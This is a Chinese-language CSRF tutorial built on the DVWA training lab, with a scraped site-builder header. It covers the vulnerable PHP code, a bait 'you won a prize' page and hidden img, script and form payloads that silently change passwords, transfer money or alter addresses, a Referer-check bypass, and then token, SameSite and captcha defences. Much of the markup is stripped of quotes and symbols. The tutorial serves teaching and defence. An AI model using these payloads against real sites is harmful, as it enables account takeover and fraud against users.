2026/3/30 1:21:03
网站建设
项目流程
网站建设总体需求报告,可信网站的作用,自己可以做网站,网站页面布局图漏洞原理
CSRF工作流程#xff1a;
1. 用户登录网站A#xff0c;获得Cookie
2. 用户访问恶意网站B#xff08;未退出A#xff09;
3. 网站B构造请求发送到网站A
4. 浏览器自动携带Cookie
5. 网站A认为是合法请求并执行Low级别攻击
功能分析
页面功能#xff1a;修改密…漏洞原理CSRF工作流程1. 用户登录网站A获得Cookie 2. 用户访问恶意网站B未退出A 3. 网站B构造请求发送到网站A 4. 浏览器自动携带Cookie 5. 网站A认为是合法请求并执行Low级别攻击功能分析页面功能修改密码 请求方式GET URL: http://127.0.0.1/vulnerabilities/csrf/?password_new123password_conf123ChangeChange后端代码?phpif(isset($_GET[password_new])){$pass_new$_GET[password_new];$pass_conf$_GET[password_conf];if($pass_new$pass_conf){// 修改密码无任何验证$queryUPDATE users SET password MD5($pass_new) WHERE user admin;mysqli_query($conn,$query);}}?漏洞点使用GET请求修改密码无Token验证无二次确认无当前密码验证攻击实施恶意页面代码!DOCTYPEhtmlhtmlheadtitle您已中奖/title/headbodyh1恭喜您/h1pbastylebackground-color:red;padding:10px;color:white;hrefhttp://127.0.0.1/vulnerabilities/csrf/?password_newhackedpassword_confhackedChangeChange点击领取奖品/a/b/p/body/html攻击流程1. 管理员登录DVWA127.0.0.1 2. 在同一浏览器打开攻击者网页 3. 点击点击领取奖品链接 4. 密码被修改为hacked 5. 管理员下次登录失败自动化攻击!-- 用户打开页面就自动触发 --imgsrchttp://127.0.0.1/vulnerabilities/csrf/?password_newhackedpassword_confhackedChangeChangestyledisplay:none!-- 或使用JavaScript --scriptdocument.locationhttp://127.0.0.1/vulnerabilities/csrf/?password_newhackedpassword_confhackedChangeChange;/script实际危害场景金融系统攻击!-- 转账请求 --imgsrchttp://bank.com/transfer?toattackeramount10000社交网络攻击!-- 关注攻击者 --imgsrchttp://social.com/follow?userattacker!-- 发布广告内容 --formactionhttp://social.com/postmethodPOSTinputnamecontentvalue广告内容/formscriptdocument.forms[0].submit();/script电商平台攻击!-- 修改收货地址 --formactionhttp://shop.com/addressmethodPOSTinputnameaddressvalue攻击者地址/formMedium级别绕过防护代码if(stripos($_SERVER[HTTP_REFERER],$_SERVER[SERVER_NAME])!false){// 检查Referer头}绕过方法!-- 在攻击者域名中包含目标域名 --攻击者域名: 127.0.0.1.attacker.com 或创建子域名: 127-0-0-1.attacker.comCSRF完整防护方案1. Token验证最重要// 生成Tokensession_start();$_SESSION[csrf_token]bin2hex(random_bytes(32));// HTML表单input typehiddennamecsrf_tokenvalue?php echo$_SESSION[csrf_token]; ?// 验证Tokenif($_POST[csrf_token]!$_SESSION[csrf_token]){die(CSRF Token验证失败);}2. SameSite Cookiesetcookie(session,$value,[samesiteStrict,// 或Laxhttponlytrue,securetrue]);3. 验证Referer$referer$_SERVER[HTTP_REFERER]??;if(strpos($referer,https://yourdomain.com)!0){die(非法请求来源);}4. 二次确认// 敏感操作要求输入当前密码if($_POST[current_password]!$user_password){die(当前密码错误);}5. 验证码// 敏感操作添加验证码if(!verify_captcha($_POST[captcha])){die(验证码错误);}职业安全建议网络安全职业现状行业特点相比其他行业安全岗位裁员较少外企可能存在合同陷阱6个月试用期技术能力是最好的保障风险警示入侵公司系统 → 被安全团队溯源 → 立即辞退 → 法律责任保命技能运维工程师必备Linux/Windows Server管理服务器架构设计应急响应能力DOS攻击防护提权技术理解开发工程师现状普遍缺乏安全意识99.9%不学习安全知识成为最大的安全隐患建议技术能力强的开发者学习安全知识找红队专家审核关键代码定期进行安全培训